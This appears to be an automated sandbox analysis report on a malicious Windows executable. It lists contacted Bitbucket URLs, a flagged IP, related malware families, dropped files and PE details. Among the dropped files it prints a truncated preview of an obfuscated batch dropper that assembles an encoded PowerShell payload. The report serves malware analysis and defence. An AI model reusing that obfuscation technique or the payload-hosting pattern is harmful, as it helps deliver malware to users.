                                            https://bitbucket.org/gateway/api/emoji/powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://bqlf8qjztdtr.statuspage.iopowershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1558255319.000002320A2EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://bitbucket.orgpowershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC72E0000.00000004.00000800.00020000.00000000.sdmptrue
                                                  		unknown
                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/adpowershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/logos/bipowershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1541729825.000001EED5DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://id.atlassian.com/loginpowershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://bitbucket.org/blog/wp-json/wp/v2/posts?categories=196&context=embed&per_page=6&orderby=date&powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://go.micropowershell.exe, 00000005.00000002.1521634262.000001EEC6843000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://id.atlassian.com/logoutpowershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://bitbucket.orgpowershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/jsi18n/en/djpowershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://id.atlassian.com/manage-profile/powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fhgdfhdfgd%2Ftpowershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://cdn.cookielaw.org/powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/default_powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://aka.ms/pscore68powershell.exe, 00000004.00000002.1558255319.000002320A2BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://oneget.orgpowershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        185.166.143.49
                                                                                        		bitbucket.orgGermany
                                                                                        		16509AMAZON-02UStrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1524411
                                                                                        Start date and time:2024-10-02 19:03:47 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 4m 49s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:11
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:0XVZC3kfwL.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:278a762f5ed598ccee88a977853a7e6011759220b1095461f1c3e756a1ec725c.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.spre.evad.winEXE@9/6@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 33.3%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 29
                                                                                        • Number of non-executed functions: 36
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 4640 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 6592 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        • VT rate limit hit for: 0XVZC3kfwL.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        13:04:51API Interceptor28x Sleep call for process: powershell.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • jasonj002.bitbucket.io/

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        bitbucket.orgnTHivMbGpg.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.50
                                                                                        sRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                                                                                        • 185.166.143.49
                                                                                        envifa.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.48
                                                                                        sostener.vbsGet hashmaliciousNjratBrowse
                                                                                        • 185.166.143.50
                                                                                        S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                                                        • 185.166.143.50
                                                                                        SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                        • 185.166.143.48
                                                                                        SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                        • 185.166.143.50
                                                                                        file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                        • 185.166.143.50
                                                                                        https://www.getcoloringpages.com/coloring/359Get hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.48
                                                                                        HelperLibrary.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.50

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        AMAZON-02USnTHivMbGpg.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.50
                                                                                        main_ppc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 34.249.145.219
                                                                                        yakov.arm.elfGet hashmaliciousMiraiBrowse
                                                                                        • 18.191.162.167
                                                                                        yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                        • 108.128.211.34
                                                                                        novo.arm5.elfGet hashmaliciousMoobotBrowse
                                                                                        • 54.171.230.55
                                                                                        novo.arm64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 54.218.85.75
                                                                                        novo.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 108.156.207.191
                                                                                        novo.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 54.124.163.228
                                                                                        novo.ppc440fp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 54.184.182.174
                                                                                        novo.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 13.242.57.236

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0enTHivMbGpg.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.49
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.49
                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                        • 185.166.143.49
                                                                                        PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 185.166.143.49
                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                        • 185.166.143.49
                                                                                        QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.49
                                                                                        QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.49
                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                        • 185.166.143.49
                                                                                        inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 185.166.143.49
                                                                                        doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 185.166.143.49

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.773832331134527
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllulp/t:NllU
                                                                                        MD5:5442F9D4E495E0E893EBB53D1D5FEAD0
                                                                                        SHA1:E6A541BDA8343980B1295901A05C1CEFBE3478CB
                                                                                        SHA-256:897E70C15D10F0405D7C5FF51A72638C434E84C32B64A2C319236D6C7EC82FA8
                                                                                        SHA-512:59815DFE6C0569DC3D26F893B04AA0E37852CDEB293705A886A804E9BAEFABB60577652C7CC31A60FBD2F13530BE9232B1C227BDE24D8D8860AAE621E8033656
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:@...e.................................P.h.......................

                                                                                        C:\Users\user\AppData\Local\Temp\IXP000.TMP\gam.bat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\0XVZC3kfwL.exe
                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (720), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):12979
                                                                                        Entropy (8bit):5.612187145250781
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:vOgsMvGCbeWP/tuHFB1f22QrXUHcVZBZNc02BrfF0e5VGqBw3m77apwqx/nLTLvO:m2xibzfAZ2Bue55ka7ti3VfEE0
                                                                                        MD5:C0BCEC2ED74752892D9B06A8F86965C7
                                                                                        SHA1:5695D0E896B986C18AD3CD3F5D6A176283E1BF4D
                                                                                        SHA-256:E98CBF1C5F26F7A5A2C77B33F87D85A10EC20D82A2B6F82E271EE881C1A28DC6
                                                                                        SHA-512:52E16D35B38A52F71995E056A3A3C2E0B0229EA84656DDDC59C7D963A4DC27CBCD67C5ED36D5FD7445CA1052D019750656EAB2694BA7D2C607B4107615F7F356
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:@echo off..GOTO ............:............SET ..........=h#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I#..GOTO ............:............SET ..........=ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C#..GOTO ............:............SET ..........=#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#G8#cgBG#EE#bQBj#G8#LwBz#GQ#YQBv#Gw#b..GOTO ............:............SET ..........=s#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#..GOTO ..........2..:............SET ..........=Bv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#B..GOTO ..........9..:............SET ....

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_byhsqu4j.ncv.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfau4nce.jli.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mj41achv.n4w.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvwo4ld4.pqp.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Entropy (8bit):6.173539047481159
                                                                                        TrID:
                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:0XVZC3kfwL.exe
                                                                                        File size:192'512 bytes
                                                                                        MD5:af93d5a246b37ce552356e6b61c9aec9
                                                                                        SHA1:e3f611e2601ff2bad622e2b1ccbdf8626f5cfd47
                                                                                        SHA256:278a762f5ed598ccee88a977853a7e6011759220b1095461f1c3e756a1ec725c
                                                                                        SHA512:6ca6791f72191aefcffb3e2e99b8035b082962f604263f6cf85727eadb9b6b7a9283d9259ebef7087dc567932a531143483cc4aab6787172ff3788edecc43879
                                                                                        SSDEEP:3072:3HwrxmMpvDITZg1S25vWp1icKAArDZz4N9GhbkENEkdY8r:ArMZNp0yN90vEA1
                                                                                        TLSH:5A146C0A67E420AAE4B5537459F2C2735A317CB15B74D6AF12C4AD7F3E236C0A532B07
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Kr..%!..%!..%!&. ..%!&.& ..%!&.! ..%!&.$ ..%!..$!b.%!&.- ..%!&..!..%!&.' ..%!Rich..%!................PE..d....y............"

                                                                                        File Icon

                                                                                        Icon Hash:823092d2ec684430

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x140008460
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:10
                                                                                        OS Version Minor:0
                                                                                        File Version Major:10
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:10
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        dec eax
                                                                                        sub esp, 28h
                                                                                        call 00007FD14CF16820h
                                                                                        dec eax
                                                                                        add esp, 28h
                                                                                        jmp 00007FD14CF1609Bh
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        dec eax
                                                                                        mov dword ptr [esp+08h], ebx
                                                                                        dec eax
                                                                                        mov dword ptr [esp+10h], edi
                                                                                        inc ecx
                                                                                        push esi
                                                                                        dec eax
                                                                                        sub esp, 000000B0h
                                                                                        and dword ptr [esp+20h], 00000000h
                                                                                        dec eax
                                                                                        lea ecx, dword ptr [esp+40h]
                                                                                        call dword ptr [00000F8Dh]
                                                                                        nop
                                                                                        dec eax
                                                                                        mov eax, dword ptr [00000030h]
                                                                                        dec eax
                                                                                        mov ebx, dword ptr [eax+08h]
                                                                                        xor edi, edi
                                                                                        xor eax, eax
                                                                                        dec eax
                                                                                        cmpxchg dword ptr [000046C2h], ebx
                                                                                        je 00007FD14CF1609Ch
                                                                                        dec eax
                                                                                        cmp eax, ebx
                                                                                        jne 00007FD14CF160AFh
                                                                                        mov edi, 00000001h
                                                                                        mov eax, dword ptr [000046B8h]
                                                                                        cmp eax, 01h
                                                                                        jne 00007FD14CF160ACh
                                                                                        lea ecx, dword ptr [eax+1Eh]
                                                                                        call 00007FD14CF166B3h
                                                                                        jmp 00007FD14CF16119h
                                                                                        mov ecx, 000003E8h
                                                                                        call dword ptr [00000F3Bh]
                                                                                        jmp 00007FD14CF16056h
                                                                                        mov eax, dword ptr [00004693h]
                                                                                        test eax, eax
                                                                                        jne 00007FD14CF160F5h
                                                                                        mov dword ptr [00004685h], 00000001h
                                                                                        dec esp
                                                                                        lea esi, dword ptr [000011BEh]
                                                                                        dec eax
                                                                                        lea ebx, dword ptr [0000119Fh]
                                                                                        dec eax
                                                                                        mov dword ptr [esp+30h], ebx
                                                                                        mov dword ptr [esp+24h], eax
                                                                                        dec ecx
                                                                                        cmp ebx, esi
                                                                                        jnc 00007FD14CF160C1h
                                                                                        test eax, eax
                                                                                        jne 00007FD14CF160C1h
                                                                                        dec eax
                                                                                        cmp dword ptr [ebx], 00000000h
                                                                                        je 00007FD14CF160ACh
                                                                                        dec ecx
                                                                                        mov edx, 5E523070h

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa2b40xb4.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1ff2a.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x42c.pdata
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x2c.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x9a680x54.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x138.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x91480x520.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x7e400x8000d22d8a48c14d2185814d2ed24fb0aed1False0.546173095703125data6.092855112591348IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x90000x23400x30003748ff8966297360bdba725e2d585c23False0.318359375data3.84344715350442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0xc0000x1f000x1000f198899505f620007167379f74f8141cFalse0.083251953125data1.0384025678015962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .pdata0xe0000x42c0x10002d9ecb32a70228f2b07b654e216a79eeFalse0.156005859375data1.4378876073270839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xf0000x1ff2a0x200002c9a76bd28e5ad47d67b408069bdcbbeFalse0.6653289794921875data6.62368679991532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
